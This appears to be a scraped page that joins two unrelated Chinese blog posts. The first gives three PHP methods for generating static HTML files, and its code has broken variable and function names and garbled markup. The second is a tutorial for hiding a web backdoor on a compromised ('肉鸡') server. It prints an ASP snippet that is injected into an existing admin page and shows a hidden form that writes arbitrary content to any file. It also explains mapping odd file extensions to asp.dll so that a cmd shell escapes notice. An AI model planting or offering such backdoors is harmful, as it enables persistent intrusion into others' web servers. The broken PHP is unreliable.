http://blog.chinaitlab.com/html/78/1727878-708686.html
Php 生成静态html文件 的三种方法
上一篇 / 下一篇 2010-07-25 09:58:32 / 个人分类:JAVA地带
查看( 35 ) / 评论( 1 ) / 评分( 3 / 0 )
本文将介绍Php 生成静态html文件的三种方法 。
1,下面使用模版的一个方法!
<?php
$fp = fopen ("templets.html","a");
if ($fp){
$fup = fread ($fp,filesize("templets.html"));
$fp2 = fopen ("html.shtml","w");
if ($fwrite ($fp2,$fup)){
$fclose ($fp);
$fcolse ($fp2);
die ("写入模板成功");
} else {
fclose ($fp);
die ("写入模板失败!");
}
}
?>
简单的将模板写进一个文件中存为html.html
2,按时间生成html文件名
<?
$cjavascript:tagshow(event, '%BE%B2%CC%AC');" href="javascript:;" target=_self>静态生成网页的测试文件,
文件名格式一般为<font color=#ff0000>年月日时分秒.html</font>";
$date = date('YmdHis');
$fp = fopen (date('YmdHis') . '.html',"w");
//本函数可用来打开本地或者远端的文件 'w' 开文件方式为写入,
文件指针指到开始处,并将原文件的长度设为 0。若文件不存在,
则建立新文件。
if (fwrite ($fp,$content)){
//格式是.int fwrite(int fp(文件名), string string(内容),
int [length](长度));本函数将字符串 string 写入文件资料流的指针 fp 上。
若有指定长度 length,则会写入指定长度字符串,或是写到字符串结束。
fclose ($fp);//函数用来关闭已经打开的文件的指针 fp。
成功返回 true,失败则返回 false。
die ("写入模板成功");
} else {
fclose ($fp);
die ("写入模板失败!");
}
echo ($content);
?>
3,下面为转换文件名的一个方法
<?php
$s_fname = "93e.php";
$o_fname = "93e.htm";
ob_end_clean();
ob_start();
include($s_fname);
$length = ob_get_length();
$buffer = ob_get_contents();
$buffer = eregi_replace("r","",$buffer);
ob_end_clean();
$fp = fopen($o_fname,"w+");
fwrite($fp,$buffer);
fclose($fp);
?>
这样就可以把 93e.php转化为静态的HTML文件了 。要注意的是待转换的文件里不能有 ob_end_clean();和 ob_start();语句,且目录要有写权限
http://blog.chinaitlab.com/html/78/1727878-708686.html
代码详解:ASP后门的放置方法
上一篇 / 下一篇 2010-07-25 10:03:26 / 个人分类:JAVA地带
查看( 60 ) / 评论( 0 ) / 评分( 0 / 0 )
传在肉鸡上的asp后门,即使你改了代码,躲过了杀毒软件,但是细心的管理员也会发现在他网站web目录下会多出一个asp文件。针对这个问题,我想了两个办法,并没什么技术性可言,只是一个思路而已。
一种是aspInjection(好像这个词真流行呀)。一个动网文章管理的登陆页面,和平常没什么两样,原有的功能都存在。
看一下,用了http://xxx/admin.asp?id=1就多出一个东东来了,第二个图下面这个框,你可以用它来生成网页木马,可以生成asp/php/cgi等网页后门。怎么做到的呢?只要你将这段代码插入某个asp网页代码最下端即可。
<%
onerrorresumenext
id=request("id")
ifrequest("id")=1then
testfile=Request.form("name")
msg=Request.form("message")
setfs=server.CreateObject("scripting.filesystemobject")
setthisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg&"")
thisfile.close
setfs=nothing
%>
<formmethod="POST"ACTION="你要插入的asp文件名?id=1">
<inputtype="text"size="20"name="Name"
value="http://blog.77169.com/<%=server.mappath("xp.asp"")%>>
<textareaname="Message"class=input>
</textarea>
<inputtype="submit"name="Send"value="生成"class=input>
</form>
<%endif%>
值得注意的是这段代码要求服务器支持fso,并且不是在所有的asp文件里都生效的。像被插入的asp文件有包含代码,即有这样的代码,这段代码就不生效了,但不会影响原文件使用。如果你会写asp,你可以将一些asp后门直接写在肉鸡原有的asp文件里。
版主allen写了一个asp文件,一运行会感染所有的asp文件,同目录下每个asp文件都会被插入类似的代码。不知他几时提供下载。:_)
第二,在iis管理器中用asp.dll来解析任意后缀名。像图3,
我把后缀为lcx的文件名用asp.dll来解析。这样,我们把常用的cmd.asp改名为cmd.lcx,然后运行,你看会发生什么?
一样是一个网页后门。当然,起个什么后缀显得更隐蔽,看你的聪明才知智了
| 欢迎光临 云水论坛 (http://www.yunshui.net/) | Powered by Discuz! X2.5 |